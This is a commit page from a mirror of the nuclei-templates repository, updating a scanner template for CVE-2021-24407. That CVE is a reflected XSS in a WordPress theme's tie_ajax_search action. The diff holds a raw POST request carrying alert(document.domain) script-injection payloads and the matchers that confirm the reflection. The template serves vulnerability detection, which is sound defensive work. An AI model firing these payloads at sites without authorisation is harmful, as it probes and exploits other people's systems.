daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2021-24407.yaml

patch-1
Prince Chaddha 2021-09-16 22:46:36 +05:30 committed by GitHub
parent 7a88129ee8
commit ac93a8acaf
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
cves/2021/CVE-2021-24407.yaml
View File

@ -8,7 +8,7 @@ info:
reference: reference:
- https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153
- https://nvd.nist.gov/vuln/detail/CVE-2021-24407 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407
tags: cves,cve2021,wordpress,xss tags: cves,cve2021,wordpress,xss,wp-theme
requests: requests:
- raw: - raw:
@ -18,20 +18,20 @@ requests:
Accept: */* Accept: */*
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
action=tie_ajax_search&query[]=<svg+onload=alert(document.domain)> action=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- '<svg+onload=alert(document.domain)>' - '</script><script>alert(document.domain)</script>'
part: body part: body
- type: word - type: word
words:
- 'Content-Type: text/html'
part: header part: header
words:
- text/html
- type: status - type: status
status: status: